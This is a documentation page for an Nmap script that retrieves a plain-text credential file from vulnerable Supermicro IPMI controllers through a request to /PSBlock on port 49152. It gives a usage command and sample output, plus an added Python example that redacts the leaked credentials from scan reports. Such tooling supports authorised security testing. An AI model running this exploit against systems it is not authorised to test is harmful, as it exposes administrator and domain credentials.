
File supermicro-ipmi-conf

Script types: portrule
Categories: exploit, vuln
Download: http://nmap.org/svn/scripts/supermicro-ipmi-conf.nse

User Summary

Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.

The script connects to port 49152 and issues a request for "/PSBlock" to download the file. This configuration file lists the controller's users together with their passwords in plain text.

References:

Script Arguments

supermicro-ipmi-conf.out

Output file in which to store the downloaded configuration file. Default: <ip>_bmc.conf

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.showall

See the documentation for the vulns library.

Example Usage

nmap -p49152 --script supermicro-ipmi-conf <target>

Script Output

PORT      STATE SERVICE REASON
49152/tcp open  unknown syn-ack
| supermicro-ipmi-conf: 
|   VULNERABLE:
|   Supermicro IPMI/BMC configuration file disclosure
|     State: VULNERABLE (Exploitable)
|     Description:
|       Some Supermicro IPMI/BMC controllers allow attackers to download
|        a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the 
|       network's Active Directory.
|     Disclosure date: 2014-06-19
|     Extra information:
|       Snippet from configuration file:
|   .............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14.............
|   Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf'
|   
|     References:
|_      http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
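
Because the output above embeds a snippet of the configuration file, the scan report itself ends up holding plain-text passwords. The following Python is an added example, not part of Nmap or of this script: it reads Nmap XML output (-oX), lists the hosts the script reported as VULNERABLE, and redacts the snippet before the finding is passed on. The sample XML, its addresses and its password are constructed, and the redaction assumes the output layout shown above.

```python
import xml.etree.ElementTree as ET

SCRIPT_ID = "supermicro-ipmi-conf"

# Constructed sample of `nmap -oX` output; hosts and password are made up.
SAMPLE_XML = (
    '<nmaprun><host><address addr="192.0.2.10" addrtype="ipv4"/><ports>'
    '<port protocol="tcp" portid="49152"><state state="open"/>'
    '<script id="supermicro-ipmi-conf" output="&#10;  VULNERABLE:&#10;'
    '    State: VULNERABLE (Exploitable)&#10;    Extra information:&#10;'
    '      Snippet from configuration file:&#10;'
    '  ....ADMIN....ExamplePassw0rd....&#10;'
    '  Configuration file saved to &apos;192.0.2.10_bmc.conf&apos;&#10;"/>'
    '</port></ports></host>'
    '<host><address addr="192.0.2.11" addrtype="ipv4"/><ports>'
    '<port protocol="tcp" portid="49152"><state state="open"/>'
    '<script id="supermicro-ipmi-conf" output="&#10;  NOT VULNERABLE:&#10;'
    '    State: NOT VULNERABLE&#10;"/>'
    '</port></ports></host></nmaprun>'
)


def redact(output):
    """Replace the config-file snippet with a marker (assumes the layout above)."""
    kept, in_snippet = [], False
    for line in output.splitlines():
        text = line.strip()
        if text.startswith(("Configuration file saved", "References:")):
            in_snippet = False
        if in_snippet:
            continue  # drop raw bytes that may hold plain-text passwords
        kept.append(line)
        if text.startswith("Snippet from configuration file:"):
            kept.append("  [snippet redacted]")
            in_snippet = True
    return "\n".join(kept)


def vulnerable_hosts(xml_text):
    """Return one redacted finding per host/port the script flagged."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            for script in port.findall("script"):
                out = script.get("output", "")
                if script.get("id") == SCRIPT_ID and "State: VULNERABLE" in out:
                    findings.append({"host": addr, "port": int(port.get("portid")),
                                     "report": redact(out)})
    return findings
```

The saved <ip>_bmc.conf file holds the same credentials and needs the same handling as the report.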

Requires


Author: Paulino Calderon <calderon () websec mx>

License: Same as Nmap--See http://nmap.org/book/man-legal.html
